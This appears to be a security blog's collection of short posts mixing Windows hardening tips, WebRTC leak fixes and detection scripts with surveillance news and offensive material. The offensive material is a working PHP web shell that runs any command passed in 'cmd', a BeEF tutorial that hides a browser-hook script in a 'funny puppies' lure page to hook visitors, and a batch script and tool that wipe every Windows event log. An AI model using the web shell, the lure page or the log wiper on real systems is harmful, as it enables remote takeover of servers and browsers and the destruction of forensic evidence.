Clear All Windows System Logs – AntiForensics

Clear All Windows System Logs using ClearLogs (wevtutil.exe).

wevtutil
Enables you to retrieve information about event logs and publishers.
You can also use this command to install and uninstall event manifests,
to run queries, and to export, archive, and clear logs.

Development:
Built on .Net Framework 4.5.1 with Visual Studio 2013.

Download Page:
http://sourceforge.net/projects/clearlogs/

Source Page:
https://github.com/maldevel/clearlogs

List Mutex names on your system

1. Download Handle by Mark Russinovich

2. Run cmd.exe as administrator

3. Type and execute:

handle -a | findstr Mutant

Enable Windows Authenticode signature verification

Microsoft Security Bulletin MS13-098

This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if a user or application runs or installs a specially crafted, signed portable executable (PE) file on an affected system.

This security update is rated Critical for all supported releases of Windows.

The security update addresses the vulnerability by modifying how the WinVerifyTrust function handles Windows Authenticode signature verification for portable executable files. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the vulnerability later in this bulletin.

https://technet.microsoft.com/library/security/ms13-098

For 32-bit versions of Microsoft Windows

Paste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension (for example, enableAuthenticodeVerification.reg).

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Wintrust\Config]
"EnableCertPaddingCheck"="1"

You can apply this .reg file to individual systems by double-clicking it.

Note: You must restart the system for your changes to take effect.

For 64-bit versions of Microsoft Windows

Paste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension (for example, enableAuthenticodeVerification64.reg).

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Wintrust\Config]
"EnableCertPaddingCheck"="1"

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Cryptography\Wintrust\Config]
"EnableCertPaddingCheck"="1"

You can apply this .reg file to individual systems by double-clicking it.

Note: You must restart the system for your changes to take effect.

Impact of enabling the functionality changes included in the MS13-098 update: non-conforming binaries will appear unsigned and will therefore be rendered untrusted.

https://technet.microsoft.com/library/security/2915720
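As an added example that is not from the bulletin or this post, the following PowerShell reports whether EnableCertPaddingCheck is set to "1" under both registry paths written by the .reg files above (only the first path applies on 32-bit Windows). It assumes it is run in an elevated PowerShell session on the machine being checked.

```powershell
# Added example: report the MS13-098 EnableCertPaddingCheck state.
# Assumes an elevated session on the host being checked.
function Get-CertPaddingCheckStatus {
    $paths = @(
        'HKLM:\SOFTWARE\Microsoft\Cryptography\Wintrust\Config',
        'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Wintrust\Config'
    )
    foreach ($path in $paths) {
        # The Wow6432Node path only exists on 64-bit Windows.
        if ($path -like '*Wow6432Node*' -and -not [Environment]::Is64BitOperatingSystem) {
            continue
        }
        # A missing key or missing value is reported as $null rather than an error.
        $item  = Get-ItemProperty -Path $path -Name 'EnableCertPaddingCheck' -ErrorAction SilentlyContinue
        $value = if ($item) { $item.EnableCertPaddingCheck } else { $null }
        [pscustomobject]@{
            Path    = $path
            Value   = $value
            # The .reg files above store the value as the string "1"; a DWORD 1 also compares equal.
            Enabled = ($null -ne $value -and $value -eq '1')
        }
    }
}

Get-CertPaddingCheckStatus | Format-Table -AutoSize
```

A row with Enabled = False means that path still lacks the hardening and the corresponding .reg file (followed by a restart) has not been applied.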


Tracking techniques are getting “deeper”…

As people are getting more and more aware of possible security risks, the well-known surveillance firms find deeper and lower-level ways of getting access to your data.

With just a few days difference, we are hearing about possible spying firmware on our hard drives and stolen encryption keys for our SIM cards!

Pretty interesting…

Russian Researchers Expose Breakthrough U.S. Spying Program | 2015/02/16

(Reuters) – The U.S. National Security Agency has figured out how to hide spying software deep within hard drives made by Western Digital, Seagate, Toshiba and other top manufacturers, giving the agency the means to eavesdrop on the majority of the world’s computers, according to cyber researchers and former operatives.

That long-sought and closely guarded ability was part of a cluster of spying programs discovered by Kaspersky Lab, the Moscow-based security software maker that has exposed a series of Western cyberespionage operations.

Kaspersky said it found personal computers in 30 countries infected with one or more of the spying programs, with the most infections seen in Iran, followed by Russia, Pakistan, Afghanistan, China, Mali, Syria, Yemen and Algeria. The targets included government and military institutions, telecommunication companies, banks, energy companies, nuclear researchers, media, and Islamic activists, Kaspersky said. (reut.rs/1L5knm0)

… [read the whole article here]

The Great SIM Heist | 2015/02/19

AMERICAN AND BRITISH spies hacked into the internal computer network of the largest manufacturer of SIM cards in the world, stealing encryption keys used to protect the privacy of cellphone communications across the globe, according to top-secret documents provided to The Intercept by National Security Agency whistleblower Edward Snowden.

The hack was perpetrated by a joint unit consisting of operatives from the NSA and its British counterpart Government Communications Headquarters, or GCHQ. The breach, detailed in a secret 2010 GCHQ document, gave the surveillance agencies the potential to secretly monitor a large portion of the world’s cellular communications, including both voice and data.

The company targeted by the intelligence agencies, Gemalto, is a multinational firm incorporated in the Netherlands that makes the chips used in mobile phones and next-generation credit cards. Among its clients are AT&T, T-Mobile, Verizon, Sprint and some 450 wireless network providers around the world. The company operates in 85 countries and has more than 40 manufacturing facilities. One of its three global headquarters is in Austin, Texas and it has a large factory in Pennsylvania.

In all, Gemalto produces some 2 billion SIM cards a year. Its motto is “Security to be Free.”

… [read the whole article here]

How to use BeEF – Quick Tutorial

BeEF – The Browser Exploitation Framework
BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

Tutorial

1. Start Apache service if not running

service apache2 start

2. Navigate to the /var/www/ directory and remove any default Apache files and folders.

3. Create an empty index.html file

4. Create a folder and name it, for example, funnypuppies

5. Download a picture of funny puppies and store it inside the funnypuppies folder as funnypuppies.jpg (the file name used in the HTML below).

6. Create an index.html file inside funnypuppies folder.

7. Add the following html code in your index.html file.

Funny Puppies<script src="http://your.ip.address:3000/hook.js"></script><img src="funnypuppies.jpg" alt="" />

8. Open BeEF: go to Applications -> Kali Linux -> Exploitation Tools -> BeEF XSS Framework -> beef

9. Your browser will open http://127.0.0.1:3000/ui/authentication. The default BeEF username is beef and the default password is beef.

10. Now you have to get people to open your link, http://your.external.ip.address/funnypuppies.jpg. Whoever visits the link will have their browser appear in BeEF’s tree.

Enjoy

WebRTC Vulnerability leaks Real IP Address

WebRTC Vulnerability leaks Real IP Address of VPN User.

This security flaw can reveal your real IP address, even if you’re using a VPN, and it’s easy to exploit.

To check if you are safe or not:

> Visit https://diafygi.github.io/webrtc-ips/ while you are connected to your VPN.

> If your real IP address is in the results of the test then your browser is leaking your IP.

To prevent this from happening:

For Chrome Users:
> Install this addon, https://chrome.google.com/webstore/detail/scriptsafe/oiigbmnaadbkfbmpbfijlflahbdbdgdf?hl=en.

For Firefox Users:
> Open about:config
> Locate media.peerconnection.enabled
> Set it to false

To confirm that WebRTC is disabled:

> Visit https://www.browserleaks.com/webrtc
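The Firefox setting above can be enforced for every profile instead of being set by hand in about:config. The following PowerShell is an added example, not part of the original post: it writes media.peerconnection.enabled = false into each profile's user.js, a file Firefox applies over prefs.js at startup. It assumes a standard per-user Firefox install on Windows with profiles under %APPDATA%\Mozilla\Firefox\Profiles.

```powershell
# Added example: enforce media.peerconnection.enabled = false for every
# Firefox profile of the current user by writing it to user.js.
# Firefox reads user.js at startup and applies it over prefs.js, so the
# setting is re-applied even if it was flipped back in about:config.
# Assumes profiles live under %APPDATA%\Mozilla\Firefox\Profiles;
# close Firefox before running so prefs.js is not rewritten mid-change.
function Disable-FirefoxWebRtc {
    $profileRoot = Join-Path $env:APPDATA 'Mozilla\Firefox\Profiles'
    if (-not (Test-Path $profileRoot)) {
        Write-Warning "No Firefox profiles found under $profileRoot"
        return
    }
    $prefLine = 'user_pref("media.peerconnection.enabled", false);'
    foreach ($profile in Get-ChildItem -Path $profileRoot -Directory) {
        $userJs = Join-Path $profile.FullName 'user.js'
        $lines = @()
        if (Test-Path $userJs) {
            # Keep every other line; drop any earlier value for this pref so
            # the file ends up with exactly one setting for it.
            $lines = @(Get-Content -Path $userJs |
                Where-Object { $_ -notmatch '"media\.peerconnection\.enabled"' })
        }
        $lines += $prefLine
        # The content is plain ASCII; avoid a BOM at the top of user.js.
        Set-Content -Path $userJs -Value $lines -Encoding ASCII
        [pscustomobject]@{ Profile = $profile.Name; UserJs = $userJs }
    }
}

Disable-FirefoxWebRtc | Format-Table -AutoSize
```

After restarting Firefox, the browserleaks page above should no longer list any ICE candidates.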

How the NSA is tracking people

http://apps.washingtonpost.com/g/page/national/how-the-nsa-is-tracking-people-right-now/634/?tid=sm_fb

Create a Java Certificate

keytool.exe -genkey -keyalg algorithm -alias my_alias -keystore myfilename.jks -storepass my_password -validity my_days -keysize my_size
Options:
 -alias <alias>                  alias name of the entry to process
 -keyalg <keyalg>                key algorithm name
 -keysize <keysize>              key bit size
 -sigalg <sigalg>                signature algorithm name
 -destalias <destalias>          destination alias
 -dname <dname>                  distinguished name
 -startdate <startdate>          certificate validity start date/time
 -ext <value>                    X.509 extension
 -validity <valDays>             validity number of days
 -keypass <arg>                  key password
 -keystore <keystore>            keystore name
 -storepass <arg>                keystore password
 -storetype <storetype>          keystore type
 -providername <providername>    provider name
 -providerclass <providerclass>  provider class name
 -providerarg <arg>              provider argument
 -providerpath <pathlist>        provider classpath
 -v                              verbose output
 -protected                      password through protected mechanism

Example:

keytool.exe -genkey -keyalg RSA -alias myjavacert -keystore mykeystore.jks -storepass 123456qwerty -validity 365 -keysize 2048

A quick and dirty php web shell

<?php
// Runs the command passed as the cmd parameter (GET or POST) and shows its output.
if (isset($_REQUEST['cmd'])) {
	echo "Command: <span style='color:red;'><b>" . $_REQUEST['cmd'] . "</b></span> executed.";
	echo "<pre style='border:solid 3px red;background:black;color:white;padding:10px;font-size:14px;'>";
	$cmd = $_REQUEST['cmd'];
	system($cmd);
	echo "</pre>";
	die;
}

Clear All Windows Logs

1) Create a .bat file
2) Append the following:

@echo off
rem Elevation probe: without admin rights the last line of bcdedit's output is "Access is denied."
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
rem Enumerate every event log name and clear each one in turn
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared! ^<press any key^>
goto theEnd
:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
echo ^<press any key^>
:theEnd
pause>NUL

3) Run as administrator
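From the defender's side, clearing logs the way this script (and the ClearLogs tool at the top of the page) does leaves its own trace: Windows writes event 1102 to the Security log when the Security log is cleared, and event 104 (provider Microsoft-Windows-Eventlog) to the System log when any other log is cleared. The following PowerShell is an added example, not from the original post, that pulls both and names the account that performed the clear; it assumes an elevated session on the host being examined.

```powershell
# Added example: list log-clearing events from the last N days.
# Event 1102 (Security log) and event 104 (System log, for every other
# channel) are written after the clear completes, so they survive it.
# Reading the Security log requires an elevated session.
function Get-LogClearEvents {
    param([int]$Days = 30)
    $since = (Get-Date).AddDays(-$Days)
    $filters = @(
        @{ LogName = 'Security'; Id = 1102; StartTime = $since },
        @{ LogName = 'System';   Id = 104;  StartTime = $since }
    )
    foreach ($filter in $filters) {
        # Get-WinEvent reports "no events found" as an error; silence it.
        Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
            # Both events carry a <LogFileCleared> element in UserData with the
            # account that performed the clear; 104 also names the channel.
            $data = ([xml]$_.ToXml()).Event.UserData.LogFileCleared
            [pscustomobject]@{
                Time      = $_.TimeCreated
                EventId   = $_.Id
                ClearedBy = "$($data.SubjectDomainName)\$($data.SubjectUserName)"
                Cleared   = $(if ($_.Id -eq 104) { $data.Channel } else { 'Security' })
            }
        }
    }
}

Get-LogClearEvents -Days 30 | Sort-Object Time -Descending | Format-Table -AutoSize
```

A burst of 104 events for many channels within a few seconds, followed by a single 1102, is the pattern the batch file above produces; forwarding both event IDs to a central collector keeps the evidence even if the local logs are cleared again.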